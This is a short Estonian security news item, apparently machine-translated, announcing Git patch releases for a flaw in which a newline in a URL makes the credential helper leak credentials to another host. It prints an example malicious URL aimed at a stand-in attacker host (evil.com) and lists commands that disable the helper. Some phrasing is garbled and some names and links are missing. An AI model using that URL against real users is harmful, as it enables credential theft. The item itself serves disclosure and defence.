hajutatud allika juhtimissüsteemi Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ja 2.17.4 korrigeerivad väljalasked mis kõrvaldas () käitlejas "", mis põhjustab mandaatide saatmise valele hostile, kui git-klient pääseb hoidlasse, kasutades selleks spetsiaalselt vormindatud URL-i, mis sisaldab reavahetusmärki. Seda haavatavust saab kasutada teise hosti mandaatide saatmise korraldamiseks ründaja kontrollitavasse serverisse.
Kui määrate URL-i, näiteks „https://evil.com?%0ahost=github.com/”, edastab mandaaditöötleja hostiga evil.com ühenduse loomisel saidi github.com jaoks määratud autentimisparameetrid. Probleem ilmneb selliste toimingute tegemisel nagu "git-kloon", sealhulgas alammoodulite URL-ide töötlemisel (näiteks "git alammooduli värskendus" töötleb automaatselt hoidlast pärinevas failis gitmodules määratud URL-e). Haavatavus on kõige ohtlikum olukordades, kus arendaja kloonib hoidla URL-i nägemata, näiteks alammoodulitega töötades, või süsteemides, mis sooritavad automaatseid toiminguid, näiteks paketiehitusskriptides.
Uute versioonide haavatavuste blokeerimiseks reavahetusmärgi edastamine mis tahes mandaadivahetusprotokolli kaudu edastatud väärtustes. Distributsioonide puhul saate jälgida pakettide värskenduste väljalaskmist lehtedel , , , , , , .
Lahendusena probleemi blokeerimiseks Ärge kasutage avalikele hoidlatele juurdepääsul faili credential.helper ja ärge kasutage režiimis "--recurse-submodules" märkimata hoidlate puhul "git clone". Töötleja credential.helper täielikuks keelamiseks, mis seda teeb ja paroolide hankimine aadressilt , kaitstud või paroolidega faili, saate kasutada käske:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Allikas: opennet.ru